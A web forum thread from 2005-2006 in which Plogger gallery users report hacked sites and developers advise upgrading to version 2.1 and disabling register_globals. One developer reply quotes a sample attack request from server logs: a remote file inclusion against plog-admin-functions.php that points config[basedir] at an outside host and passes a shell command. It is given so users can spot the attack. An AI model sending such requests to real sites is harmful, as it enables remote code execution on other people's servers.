Not signed in (Sign In)

Vanilla 1.1.10 is a product of Lussumo. More Information: Documentation, Community Support.

    • CommentAuthorrjupiter
    • CommentTimeDec 25th 2005
     
    I was running the new 2.1 version of plogger and I decided to do some work on my layout when I noticed my galleries would not load. I looked in my FTP and found odd graphic , php and hrml files. So now I have to start all over again and reinstall everything. :(

    The security fix (in my case) did not work.
    •  
      CommentAuthormike
    • CommentTimeDec 25th 2005
     
    Are you sure it wasn't hacked before you installed the new version? There is a good chance that maybe your passwords were compromised through the vulnerability in version 2, and just now they decided to wreak some havok after the upgrade. Could you please check your raw server logs and see if you can find the malicious activity and date of attack.

    Please email us at security@plogger.org.
    • CommentAuthorrjupiter
    • CommentTimeDec 26th 2005
     
    no because I only installed ver 2.1 I never used ver 2 alway 2.1 I don't know how to check my raw logs
    •  
      CommentAuthormike
    • CommentTimeDec 26th 2005
     
    You can access your raw server logs by going to your ISP control panel, same place where you administer databases and such. There is an option to look at raw server logs, which will basically just be a list of HTTP requests to your webserver. Look for anything suspicious like:

    GET
    /photos/admin/plog-admin-functions.php?config[basedir]=http://www.blah.hpgvip.ig.com.br/cse.gif?&cmd=id

    Are you running any other applications on your website? Wordpress? Any third-party scripts?
    • CommentAuthorjasoncigar
    • CommentTimeDec 26th 2005 edited
     
    I was just hacked
    they created index.html

    will the recent update help prevent this??

    Thanks!
    •  
      CommentAuthormike
    • CommentTimeDec 26th 2005 edited
     
    rjupiter, you never used version 2 yet you created your forum account nearly three months ago? v2.1 just came out last week... just wondering.

    Jason: Yes. v2.1 is a security update for Beta 2, more information at http://www.plogger.org/two-point-one/
    • CommentAuthorddejong
    • CommentTimeDec 26th 2005
     
    I'm in agreement with Mike. rjupiter, you've been using Plogger for a long time, so it's actually impossible that you had never installed Beta 2, because I saw it on your server.

    It's not an accusation (and nobody should feel bad about it), as much as an assertion, because 2.1 is a security release; if it's insecure, we need to know and fix it. We're very sorry you got hacked, and it's not your fault, but be sure to install Beta 2.1 (or the nightly build if you're more inclined).

    Cheers,
    Derek
    • CommentAuthorrjupiter
    • CommentTimeDec 28th 2005
     
    oops , ok I think your right all my fault I was look at what was on my computer and not on my site (which I couldn't do since all got wiped) Well I contacted my host and they are shutting of the register globals on all my servers/sites as I am running Mambo/ eshop and it has the same problem and it is important that I don't get hacked with and online shop.

    Will use the new version, bad , bad me for not catching this and updating. Ah live and learn.
    • CommentAuthorddejong
    • CommentTimeDec 28th 2005
     
    No worries, rjupiter, Plogger 2.1 was released out of concern for users, because we're worried about security too. ;)

    Good luck, and yes, register_globals really should be off.

    Cheers,
    Derek
    • CommentAuthorrjupiter
    • CommentTimeJan 2nd 2006
     
    thanx, well I talked to my really great web host and he turned off register_globals on both my sites which is great and I now have v 2.1 installed. Now all I have to do is reupload all my images etc...

    *crossfinger* this won't happen again.
    • CommentAuthorttyR2
    • CommentTimeJan 4th 2006
     
    My box got hacked as well. Index.html was defaced and a bunch of php-based tools were uploaded. It appears they came in through the plogger admin function. Yea...I wasn't running the patched version. Register_globals was also on. Both have been resolved :-)